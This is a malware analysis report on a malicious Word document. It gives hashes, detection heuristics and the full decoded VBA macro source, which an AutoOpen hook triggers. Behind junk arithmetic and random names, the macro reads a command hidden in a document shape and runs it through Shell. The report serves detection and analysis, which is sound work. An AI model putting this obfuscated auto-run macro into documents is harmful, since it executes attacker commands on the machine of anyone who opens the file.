Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc129b8cfdcacaeb…

MALICIOUS

Office (OLE)

141.9 KB Created: 2018-12-11 11:41:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: 79abe79c89e73bdf72e689d721f80d3e SHA-1: f388f4000794aa32e043ea72507055250612fc8c SHA-256: fc129b8cfdcacaebbc790822bcc330bbbeed319c1b3d0d6f51f025647dae89da
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6780293-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6780293-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     _
.Shell(WjKDKLzIsAn, VMXFcS), ZkZGAI)
   FnWcvNalYIEimfrzXH = (31411959 + Round(kFEWXEZrWtCzELCprNIf) * 255998035 - AYIVWkKhzjvmkzjAEroiO + (FFZbdBIJwZtCFjNBhohp / Tan(WERaCGqJRrETVSCwuHIYnhVs)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
smwCNc
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4971 bytes
SHA-256: e73fffbe2e4c92c934aa4b5086734b60a3a2f00521ea50b4671db774182ebc35
Detection
ClamAV: No threats found
Obfuscation or payload: likely
138 of 174 identifiers look randomly generated (e.g. 'DbzDbkZIwEnrucotLYofuzUG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wSqqXWzqQm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
smwCNc
End Sub

Attribute VB_Name = "kuHzKOECqQn"
Function smwCNc()
On Error Resume Next
   lDjticiSYIWsXESGpjdRfoq = (8588623 + Round(CBAqHwYMKzfQrndDwa) * 225763977 - opJicnwYvNwNfW + (aicRLwfNEmpztAOhOIA / Tan(NsVOUzzRwDSlVLCYVJWCI)))
ErmqDYhfhEfnOiIOzLw = 92794845
   zSBkASuBRMXhBzi = (71072537 + Round(TWsiGkOWaujjhzYcEHCz) * 149367966 - kZRUREsbVEOhfUDYr + (nOaYLSjMwEzpbKIFlSRmT / Tan(iwYiUAUEZfQUMIn)))
OzkEGnifdDYZikHE = 99147209
   WFZIKjpCAasIFfj = (55172999 + Round(YpsNBOaGLVQBCqhFmfLBmLIj) * 58166657 - IjCHDUrOoTVtUqz + (wKYAzkLDTzVGLM / Tan(JEvGtDDSwJoBNksKUCkNz)))
HIYVzoDwlDcmLpZk = 35302115
   dzfGzuldYEtbtfbkGs = (104346743 + Round(BsztuYUUamUsvhRKYQl) * 127679854 - wTPjrohAKXuDnVkCmMYaR + (mjAjLOQMpGwsFZ / Tan(JDkmTQOapILjIlENsRshf)))
KcSkzinGuQLTcInnwnXIL = 159971706
Const VMXFcS = 0
   BPfTPUrVcKEOSRoUw = (44893825 + Round(ifDGfkFvjtftsAX) * 48802747 - tlElRBvbXVJFHZFNwllz + (AjJZIbzRMNvKIaMC / Tan(RdIiHOwqbTajwPlJXt)))
uLJZwKLIOuzzsK = 172700105
   RjCPMDiKwOjoFnpPu = (13834471 + Round(ftjbbijmjvAvbBNDwSFj) * 172577424 - hEUAoWilJBIaOVlHbhfRuPv + (EmsjrwoSFoLbHatJH / Tan(mzmBmsSqrYDIwSIBwBiutMMq)))
aJJABnWKwdwfCAzRBF = 106603353
Set rtTFisfME = wSqqXWzqQm.Shapes(crGwbYj + "JGZYhcdBJ" + pvXvqz)
   dRAKERrMRiIiwXoKDzidX = (66627648 + Round(MAvZAjicrbjtRZwNVPMpaJ) * 193059781 - fPGoOiGJTdoKIsr + (jBRHRdWlFjMOKUNDXmuk / Tan(tONUWZnloFdYjGYrVrBs)))
jiRszzQkmVwGzpnEmv = 29485011
   sLiLmEpOdkUNNKwqSwr = (280585983 + Round(hSFwMdnPhbYbikHkhjjBmfBh) * 169461095 - CPdMuZDbLtdOZbCw + (IvlfZrFkQHpLBQYXDaYmVjzY / Tan(ZNHTGHwojtloicX)))
biRNPJcErWBdLabwMZA = 192554623
   zfZNBijrvqatVvIGzGUU = (41027121 + Round(kiQowYjkRmCsfdsbaWsCdS) * 297897372 - BwjwUCciWHvqzMkLLLZ + (rcQfNVjwcDLSpsnCphQPJT / Tan(XiBiNlhrStEjYjElwW)))
GTwdBEZiVdvKfXGswMrS = 82378656
   ZlaFOrfDJKYiLAPuEXr = (315503575 + Round(ZSzwhorjNawnwb) * 107642218 - YCsmidYXSwTCFci + (qWzSaJhCnTvkZqOZzljV / Tan(JVvtbdiVpilvRzZbziPVqwOi)))
wbkuDTwJijBEYzfwhzpJoH = 298359146
   CYcPacUjczJhoFnUBd = (234267927 + Round(IcJvifFNGVBouCzRFhWZvzh) * 173162480 - MCNhIzdckMaPhkuW + (aHwVmlIVOUHJzJu / Tan(jSdsjwVYMKqWCYwbDoZZc)))
ZQFLtfVSkDfjwSRiablaIbv = 249700487
   jStbhVomGXisiOcNuwjhqi = (112826653 + Round(wcWJmUmbUMvLsSoljudZdn) * 51475572 - GnRiFNzBBHdFwiAlkDYSTRVc + (wzvBrIKUXDwDIWG / Tan(tJlpjnFuroaPpfpSp)))
GPBzKwSkabBicjRCZI = 236341538
   vwPtVjvnjEKvsTb = (6567271 + Round(MjzTjwUEGiIZtdSvLYwnO) * 132708235 - ijdUviLXiWMLjCqOAvoP + (nNnbrzjvfNUszVmCbZauLiDj / Tan(itVJvsZEirSptDifb)))
IsTjjDLYWNVmJJHIJFLljVun = 114901924
   ttoMziEVwLizbWvt = (99197641 + Round(qSjJiwfVudrDtQa) * 237298954 - ZBDoPcwGXUtZvKKPIbrd + (KpjdoaitSNWrrWrMSbqkD / Tan(ilwzThnkoiGwOMWL)))
BSMFGXhDoSDqABtfALu = 218091677
   RaofIzPawMIAqnwrmjzKqT = (124328606 + Round(ErWAtdRXnWdWwaYl) * 264219970 - zLroRcYNwjXLzzHabR + (OhUvkMUKbtLIMVVVHVP / Tan(tcfjkAcXfOXwHKZncPH)))
zRzUkYLpdbAFMqhmCoK = 239185042
   DbzDbkZIwEnrucotLYofuzUG = (184330695 + Round(CWjtwFbvzKnvwnkk) * 157612 - UwilRNfUKPCFHrbOhCcC + (hQzfiGQbAvJzqld / Tan(RFSOcvLtrDvUiGhHzWnii)))
mGPsKUsIQFwjQzJ = 262055375
WjKDKLzIsAn = rtTFisfME.TextFrame.TextRange + GnbLw + OBzUzuDK + zjkrA + pVBqjzK + iYSLv + QGqJwIDc + wowBNGE + QfrHQjlU + arDiDp + ZphSZ
   WVibVjSNjToVjWm = (236204356 + Round(tAjzjQnklnrTfZSaYdRdqz) * 304639851 - GAcKqtODEqOInGnFqqksa + (DuWvKtVGwvGztindtrZoPpK / Tan(mRqLmANBKNzhoviV)))
ztTCpNESNztTmdOjMItCJ = 131248540
   QPuuOXNwCHNMSlhnwGJuWT = (219494221 + Round(EjRsWPFWbBCJjC) * 148971722 - okPELmRiwZUmvQRziup + (FVanCrkRjYEvjkGlDdoR / Tan(nuzuSaKjEaoNrUTKc)))
UBAvaUZDLKjtFF = 158956396
   FTdlIzaHzXUBZfTbht = (99799354 + Round(usqKRozaqYiETdzrr) * 325838808 - faljNwBClzBXzvjcMcTU + (zzQatQhvibjjMjnJJd / Tan(PlOdoBjInAkOYdMib)))
ITfUHDVRnlMtTDzEEi = 233700179
   jlLjiDpVJDYOFKR = (71452293 + Round(NRzqhUCIzRCKVS) * 37813225 - QiJlNCdZwObapmYpNYwoKQwQ + (YhmnLokSPpcHZnK / Tan(XsStbSKsNzzTRozjtbpVrm)))
aqHazwhnlnAmXfXhFXtZNq = 113370327
ptOwzpw = Array(FsCUrMwf, MfRCb, Vujwz, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(WjKDKLzIsAn, VMXFcS), ZkZGAI)
   FnWcvNalYIEimfrzXH = (31411959 + Round(kFEWXEZrWtCzELCprNIf) * 255998035 - AYIVWkKhzjvmkzjAEroiO + (FFZbdBIJwZtCFjNBhohp / Tan(WERaCGqJRrETVSCwuHIYnhVs)))
uCmCJzBZijBIBavRAhipi = 236249817
   ptmkhbYBDlBdnPLoNikc = (231383199 + Round(qZcNwTjjdPmzFmzmrZo) * 14222758 - QfKbjbvEiEstOD + (ITcESWIlrnJZoamK / Tan(jXauSmPrnbvKtGrimiYzjk)))
HuToaCHiwuEMrcTqjNNi = 306567375
   sOuaqnozfJRuAMJWo = (312124861 + Round(tzObIlZZlNniElOUts) * 167453035 - QKNKTfbSQzDGXOOVimloRNDj + (aNJmrQiPzFjjEIdKGJmKjLq / Tan(sqGGkiCHiSsSSjYiZr)))
IimZiIiKDQZKPWmtBJY = 200321569
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.